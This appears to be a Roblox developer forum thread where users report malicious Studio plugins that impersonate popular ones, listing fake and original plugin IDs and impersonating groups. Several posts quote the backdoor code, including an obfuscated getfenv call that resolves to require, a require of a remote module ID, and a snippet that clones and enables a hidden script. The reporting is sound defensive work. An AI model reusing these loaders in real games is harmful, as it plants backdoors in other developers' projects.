Malicious plugin: 5606261789
Original plugin: 4476041065
For that plugin alone, the friends of these users all look like bots. These are the only two non-bot people that are in the group that produced the malicious plugin.
Group: GizmoTjaz - Roblox --Probably trying to frame someone, actual person’s profile is here: GizmoTjaz - Roblox
DuazDaio: DuazDaio - Roblox
KaspersHub: KaspersHub - Roblox
I have a slight feeling these are stolen accounts, but I’m not sure.
Note: KaspersHub is also in a lot of other groups with similar logos.
I’m pretty sure it’s a backdoor group (and the bot accounts are possibly alts?)
Most likely, but the users I mentioned specifically have robux. I think they were stolen and then linked to all these bot accounts. Whoever did this was really good in covering their tracks. there are hundreds of bots.
plugin checks for any and all scripts in the game and places multiple lines of requirements saying this
getfenv()[‘\114\101\113\117\105\114\101’][5151855975]
Malicious plugin: 6173331887
Original plugin: 866972013
I found another malicious plugin:
Real plugin (ID:6426578337) :
Fake Plugin (ID: 6427852822):
The fake plugin contains some malicious code:
workspace:WaitForChild("\0x54\0x65\0x72\0x72\0x61\0x69\0x6e"):FindFirstChild('\0x47\0x72\0x61\0x73\0x73\0x46\0x58')then a=script:WaitForChild("\0x47\0x72\0x61\0x73\0x73\0x46\0x58"):Clone()a.Parent=workspace:WaitForChild("\0x43\0x61\0x6d\0x65\0x72\0x61")a.Disabled=false;end
And also I found GrassFX
script inside of the fake plugin:
And the code sample from the GrassFX
script:
Thank you so much, this helped me out a LOT!
This is a virus: Smooth Cam - Roblox
the string is base64 for the into of The Prince of Belair
contains bytecode interpreters
Also says it is created by @sleitnick that is a known plugin creator and his plugins are totally not malicious in anyway. Looks like the actual group is trying to impersonate.
How has this not been shut down yet?? He has multiple groups that are obviously meant to impersonate well known developers and teams.
I also found this:
Roblox Studio+
Malicious Plugin: 5871957158
Original Plugin: 144358935
Malicious Script Location: PluginGuiService > PluginGui > Layers > UIListLayout > FX
Malicious Action:
require(5870849966)
Malicious Required Module: 5870849966*
*Suspicious obfuscated code. Assuming this is the source of the backdoor that multiple posts above have connected with the Updated/New mark at the top of the plugin thumbnail.
The plugin was published by a group named ROBLOX to make it seem as if the official ROBLOX account created it.
ROBLOX Impersonation: 8135004
I hooked the functions of the obfuscated module and it seems that it was only calling require to this module MainModule - Roblox
It has a GUI for a server side backdoor service called “Ubuntu SS” which I have never heard of here is a picture.
The logging place for HTTP logs is
and the group for whitelisting seems to be
The module also seems to contain some webhooks URLs but they seem invalid. I am not sure if they were previously used for logging and were removed, if they were abused and removed thus or are just decous.
Over half of these plugins are real, without any malicious intent.
No plugin from the list is malicious.
I took a look at those plugin’s source and did not find anything. Also I see you have already posted 3 of those plugins already on this topic.
I just read through it’s source, turns out it was a mistake on my end. Sorry for re-posting, didn’t realize that.
Building Tools by F3X (Plugin)
Malicious plugin: 6240474358
Original plugin: 144950355
[FIXED] Realism Mod
Malicious plugin: 6792716290
Original plugin: 400812710
Load Character Lite
Malicious plugin: 6789266789
Original plugin: 752585459
to be continued…
Someone apparently made a copy of AlreadyPro’s Load Character Pro under the name of “AlreadyPro” a group owned by a deleted account. Reported the plugin for using the code of AlreadyPro and also malicious code.
Malicious:
Original:
Load Character Pro
Original: 4489766693
Malicious: 7070331213
Drops a malicious script. Malicious plugin creator attempting to impersonate AlreadyPro.
Yes
I would also like to report this one as well: Malicious Plugin
It’s a group that impersonates his name to promote their fake plugin.